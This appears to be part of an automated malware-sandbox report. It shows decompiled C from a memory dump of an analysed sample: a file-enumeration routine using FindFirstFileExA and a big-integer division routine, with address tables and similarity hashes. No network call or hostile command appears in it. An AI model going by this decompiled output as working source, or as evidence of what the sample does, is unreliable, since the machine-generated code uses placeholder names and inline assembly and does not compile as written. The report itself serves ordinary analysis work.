				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				intOrPtr _t101;
				signed int _t104;
				union _FINDEX_INFO_LEVELS _t105;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				signed int _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t121;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t104 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t104) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t104 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t110 = E00A07B1B(_t84, _t77, 1);
					_pop(_t86);
					__eflags = _t104;
					if(_t104 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t104;
						_t40 = E00A0DD71(_t86, _t110 + _t104, _t77, _a4);
						_t119 = _t118 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00A0A212(_a16, _t100, __eflags, _t110);
							E00A07A50(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t104);
						_t74 = E00A0DD71(_t86, _t110, _t77, _a8);
						_t119 = _t118 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00A07DBB();
							asm("int3");
							_t117 = _t119;
							_t120 = _t119 - 0x150;
							_t43 =  *0xa1d668; // 0xda86b1c8
							_v48 = _t43 ^ _t117;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t110);
							_t111 = _v332.cAlternateFileName;
							_push(_t104);
							_v372 = _t111;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00A0DDC0(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t105 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E009FE920(_t105,  &_v332, _t105, 0x140);
								_t121 = _t120 + 0xc;
								_t112 = FindFirstFileExA(_t78, _t105,  &_v332, _t105, _t105, _t105);
								_t55 = _v336;
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00A09FD3(_t78, _t92, _t105, _t112,  &(_v332.cFileName), _t78, _v340);
											_t121 = _t121 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t112,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t102 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00A05030(_t78, _t105, _t112, _t102 + _t95 * 4, _t65 - _t95, 4, E00A09E2B);
									}
								} else {
									_push(_t55);
									_t57 = E00A09FD3(_t78, _t89, _t105, _t112, _t78, _t105, _t105);
									L26:
									_t105 = _t57;
								}
								__eflags = _t112 - 0xffffffff;
								if(_t112 != 0xffffffff) {
									FindClose(_t112);
								}
								_t58 = _t105;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t111);
									_t58 = E00A09FD3(_t78, _t87, 0, _t111, _t78, 0, 0);
								}
							}
							__eflags = _v12 ^ _t117;
							return E009FE203(_t58, _v12 ^ _t117);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}
















































                            0x00a09fd8
                            0x00a09fd9
                            0x00a09fdc
                            0x00a09fdc
                            0x00a09fdf
                            0x00a09fdf
                            0x00a09fe1
                            0x00a09fe2
                            0x00a09feb
                            0x00a09fec
                            0x00a09fef
                            0x00a09ff2
                            0x00a09ff7
                            0x00a09ffe
                            0x00a09fff
                            0x00a0a000
                            0x00a0a003
                            0x00a0a00d
                            0x00a0a010
                            0x00a0a011
                            0x00a0a013
                            0x00a0a027
                            0x00a0a027
                            0x00a0a02a
                            0x00a0a034
                            0x00a0a039
                            0x00a0a03c
                            0x00a0a03e
                            0x00000000
                            0x00a0a040
                            0x00a0a044
                            0x00a0a04d
                            0x00a0a053
                            0x00000000
                            0x00a0a056
                            0x00a0a015
                            0x00a0a015
                            0x00a0a01b
                            0x00a0a020
                            0x00a0a023
                            0x00a0a025
                            0x00a0a05c
                            0x00a0a05e
                            0x00a0a05f
                            0x00a0a060
                            0x00a0a061
                            0x00a0a062
                            0x00a0a063
                            0x00a0a068
                            0x00a0a06c
                            0x00a0a06e
                            0x00a0a074
                            0x00a0a07b
                            0x00a0a07e
                            0x00a0a081
                            0x00a0a082
                            0x00a0a085
                            0x00a0a086
                            0x00a0a089
                            0x00a0a08a
                            0x00a0a0ab
                            0x00a0a0ab
                            0x00a0a0ad
                            0x00000000
                            0x00000000
                            0x00a0a092
                            0x00a0a094
                            0x00a0a096
                            0x00a0a098
                            0x00a0a09a
                            0x00a0a09c
                            0x00a0a09e
                            0x00a0a0a9
                            0x00000000
                            0x00a0a0a9
                            0x00a0a09e
                            0x00a0a09a
                            0x00000000
                            0x00a0a096
                            0x00a0a0af
                            0x00a0a0b1
                            0x00a0a0b4
                            0x00a0a0cd
                            0x00a0a0cd
                            0x00a0a0cf
                            0x00a0a0d2
                            0x00a0a0e2
                            0x00a0a0e4
                            0x00a0a0e4
                            0x00a0a0d4
                            0x00a0a0d4
                            0x00a0a0d7
                            0x00000000
                            0x00a0a0d9
                            0x00a0a0d9
                            0x00a0a0dc
                            0x00000000
                            0x00a0a0de
                            0x00a0a0de
                            0x00a0a0de
                            0x00a0a0dc
                            0x00a0a0d7
                            0x00a0a0ea
                            0x00a0a0f2
                            0x00a0a0f6
                            0x00a0a104
                            0x00a0a109
                            0x00a0a11e
                            0x00a0a120
                            0x00a0a126
                            0x00a0a129
                            0x00a0a15b
                            0x00a0a15b
                            0x00a0a15d
                            0x00a0a160
                            0x00a0a166
                            0x00a0a166
                            0x00a0a16d
                            0x00a0a187
                            0x00a0a187
                            0x00a0a196
                            0x00a0a19b
                            0x00a0a19e
                            0x00a0a1a0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0a16f
                            0x00a0a16f
                            0x00a0a175
                            0x00a0a177
                            0x00000000
                            0x00a0a179
                            0x00a0a179
                            0x00a0a17c
                            0x00000000
                            0x00a0a17e
                            0x00a0a17e
                            0x00a0a185
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0a185
                            0x00a0a17c
                            0x00a0a177
                            0x00000000
                            0x00a0a1a2
                            0x00a0a1aa
                            0x00a0a1b0
                            0x00a0a1b2
                            0x00a0a1b2
                            0x00a0a1ba
                            0x00a0a1bf
                            0x00a0a1c7
                            0x00a0a1ca
                            0x00a0a1cc
                            0x00a0a1e0
                            0x00a0a1e5
                            0x00a0a12b
                            0x00a0a12b
                            0x00a0a12f
                            0x00a0a137
                            0x00a0a137
                            0x00a0a137
                            0x00a0a139
                            0x00a0a13c
                            0x00a0a13f
                            0x00a0a13f
                            0x00a0a145
                            0x00a0a0b6
                            0x00a0a0b9
                            0x00a0a0bb
                            0x00000000
                            0x00a0a0bd
                            0x00a0a0bd
                            0x00a0a0c3
                            0x00a0a0c8
                            0x00a0a0bb
                            0x00a0a14c
                            0x00a0a157
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0a025
                            0x00a09ff9
                            0x00a09ffb
                            0x00a0a057
                            0x00a0a05b
                            0x00a0a05b
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: .
                            • API String ID: 0-248832578
                            • Opcode ID: 108ea399bb24e900c47e3aa68eea51ebdd398c0b6d1e23706ebff011c08a85df
                            • Instruction ID: 3474526ce40ae34f7f8b1ac40f84b1d5c0a5fe857b06b93e11ff43938864aa77
                            • Opcode Fuzzy Hash: 108ea399bb24e900c47e3aa68eea51ebdd398c0b6d1e23706ebff011c08a85df
                            • Instruction Fuzzy Hash: 5531D27190024DABCB248F78DC84EFB7BBDDB95314F1442A8E519D7292E6309D458B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0C0B0, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00A0C0B0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E009FDDA0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00A10DE0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E009FDDC0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E009FDDC0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xa0d6cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00A10DE0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00A0AA64(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00A0AA64(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00A0AA64(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                            0x00a0c0bc
                            0x00a0c0bf
                            0x00a0c0c3
                            0x00a0c0cd
                            0x00a0c0d0
                            0x00a0c0d2
                            0x00a0c0d4
                            0x00a0c0e1
                            0x00a0c0e1
                            0x00a0c0e4
                            0x00a0c0e4
                            0x00a0c0e7
                            0x00a0c0ea
                            0x00a0c0ec
                            0x00a0c21f
                            0x00a0c221
                            0x00a0c26a
                            0x00a0c26e
                            0x00a0c274
                            0x00a0c223
                            0x00a0c225
                            0x00a0c228
                            0x00a0c22a
                            0x00a0c22d
                            0x00a0c22f
                            0x00a0c231
                            0x00a0c265
                            0x00a0c265
                            0x00a0c265
                            0x00a0c233
                            0x00a0c238
                            0x00a0c23e
                            0x00a0c23e
                            0x00a0c241
                            0x00a0c243
                            0x00a0c245
                            0x00000000
                            0x00000000
                            0x00a0c247
                            0x00a0c248
                            0x00a0c24b
                            0x00a0c24e
                            0x00a0c250
                            0x00000000
                            0x00a0c252
                            0x00000000
                            0x00a0c252
                            0x00000000
                            0x00a0c250
                            0x00a0c254
                            0x00a0c25b
                            0x00a0c25f
                            0x00a0c263
                            0x00000000
                            0x00000000
                            0x00a0c263
                            0x00a0c266
                            0x00a0c266
                            0x00a0c268
                            0x00a0c275
                            0x00a0c278
                            0x00a0c27b
                            0x00a0c27e
                            0x00a0c27e
                            0x00a0c282
                            0x00a0c285
                            0x00a0c288
                            0x00a0c28b
                            0x00a0c296
                            0x00a0c28d
                            0x00a0c292
                            0x00a0c292
                            0x00a0c2a0
                            0x00a0c2a5
                            0x00a0c2a8
                            0x00a0c2aa
                            0x00a0c2b4
                            0x00a0c2b7
                            0x00a0c2be
                            0x00a0c2c1
                            0x00a0c2c4
                            0x00a0c2cc
                            0x00a0c2d2
                            0x00a0c2d2
                            0x00a0c2d2
                            0x00a0c2d2
                            0x00a0c2c4
                            0x00a0c2d7
                            0x00a0c2de
                            0x00a0c2de
                            0x00a0c2e1
                            0x00a0c2e4
                            0x00a0c516
                            0x00a0c516
                            0x00a0c2ea
                            0x00a0c2ea
                            0x00a0c2f0
                            0x00a0c2f3
                            0x00a0c2f6
                            0x00a0c2f9
                            0x00a0c2fc
                            0x00a0c2ff
                            0x00a0c302
                            0x00a0c302
                            0x00a0c305
                            0x00a0c30c
                            0x00a0c30c
                            0x00a0c307
                            0x00a0c307
                            0x00a0c307
                            0x00a0c30e
                            0x00a0c312
                            0x00a0c315
                            0x00a0c317
                            0x00a0c31a
                            0x00a0c321
                            0x00a0c324
                            0x00a0c327
                            0x00a0c332
                            0x00a0c335
                            0x00a0c33a
                            0x00a0c33f
                            0x00a0c346
                            0x00a0c34b
                            0x00a0c34d
                            0x00a0c34f
                            0x00a0c353
                            0x00a0c356
                            0x00a0c359
                            0x00a0c361
                            0x00a0c36a
                            0x00a0c36a
                            0x00a0c36c
                            0x00a0c36f
                            0x00a0c36f
                            0x00a0c359
                            0x00a0c379
                            0x00a0c37e
                            0x00a0c383
                            0x00a0c385
                            0x00a0c388
                            0x00a0c38a
                            0x00a0c38d
                            0x00a0c390
                            0x00a0c392
                            0x00a0c395
                            0x00a0c398
                            0x00a0c39a
                            0x00a0c3a1
                            0x00a0c3a6
                            0x00a0c3a9
                            0x00a0c3b3
                            0x00a0c3b5
                            0x00a0c3b7
                            0x00a0c3ba
                            0x00a0c3ba
                            0x00a0c3bc
                            0x00a0c3bf
                            0x00a0c3c2
                            0x00a0c3c5
                            0x00a0c3c8
                            0x00a0c39c
                            0x00a0c39c
                            0x00a0c39f
                            0x00000000
                            0x00000000
                            0x00a0c39f
                            0x00a0c3cb
                            0x00a0c3cd
                            0x00a0c3cf
                            0x00000000
                            0x00a0c3d1
                            0x00a0c3d1
                            0x00a0c3d4
                            0x00a0c3d6
                            0x00a0c3d6
                            0x00a0c3e4
                            0x00a0c3e7
                            0x00a0c3ec
                            0x00a0c3ee
                            0x00000000
                            0x00000000
                            0x00a0c3f0
                            0x00a0c3f7
                            0x00a0c3f7
                            0x00a0c3fa
                            0x00a0c3fd
                            0x00a0c400
                            0x00a0c403
                            0x00a0c403
                            0x00a0c406
                            0x00a0c409
                            0x00a0c40d
                            0x00a0c410
                            0x00a0c412
                            0x00a0c415
                            0x00000000
                            0x00000000
                            0x00a0c417
                            0x00a0c415
                            0x00a0c3f2
                            0x00a0c3f2
                            0x00a0c3f5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0c3f5
                            0x00a0c41c
                            0x00a0c41c
                            0x00000000
                            0x00a0c41c
                            0x00a0c419
                            0x00000000
                            0x00a0c419
                            0x00a0c3d4
                            0x00a0c3cf
                            0x00a0c41f
                            0x00a0c41f
                            0x00a0c421
                            0x00a0c42b
                            0x00a0c42b
                            0x00a0c42e
                            0x00a0c430
                            0x00a0c432
                            0x00a0c434
                            0x00a0c439
                            0x00a0c43c
                            0x00a0c43c
                            0x00a0c43f
                            0x00a0c442
                            0x00a0c445
                            0x00a0c447
                            0x00a0c45c
                            0x00a0c45e
                            0x00a0c460
                            0x00a0c462
                            0x00a0c464
                            0x00a0c466
                            0x00a0c468
                            0x00a0c46a
                            0x00a0c46d
                            0x00a0c46d
                            0x00a0c471
                            0x00a0c473
                            0x00a0c479
                            0x00a0c47c
                            0x00a0c47c
                            0x00a0c47c
                            0x00a0c480
                            0x00a0c480
                            0x00a0c485
                            0x00a0c488
                            0x00a0c488
                            0x00a0c48d
                            0x00a0c48f
                            0x00a0c491
                            0x00a0c498
                            0x00a0c498
                            0x00a0c49a
                            0x00a0c49f
                            0x00a0c4a1
                            0x00a0c4a4
                            0x00a0c4a4
                            0x00a0c4a7
                            0x00a0c4b0
                            0x00a0c4b0
                            0x00a0c4b2
                            0x00a0c4b2
                            0x00a0c4b7
                            0x00a0c4bd
                            0x00a0c4c1
                            0x00a0c4c4
                            0x00a0c4c7
                            0x00a0c4c9
                            0x00a0c4c9
                            0x00a0c4c9
                            0x00a0c4ce
                            0x00a0c4ce
                            0x00a0c4d1
                            0x00a0c4d4
                            0x00a0c493
                            0x00a0c493
                            0x00a0c496
                            0x00000000
                            0x00000000
                            0x00a0c496
                            0x00a0c491
                            0x00a0c4db
                            0x00a0c4db
                            0x00a0c4dc
                            0x00a0c423
                            0x00a0c423
                            0x00a0c425
                            0x00000000
                            0x00000000
                            0x00a0c425
                            0x00a0c4ec
                            0x00a0c4f1
                            0x00a0c4f4
                            0x00a0c4f8
                            0x00a0c4f9
                            0x00a0c4fc
                            0x00a0c4ff
                            0x00a0c500
                            0x00a0c503
                            0x00a0c506
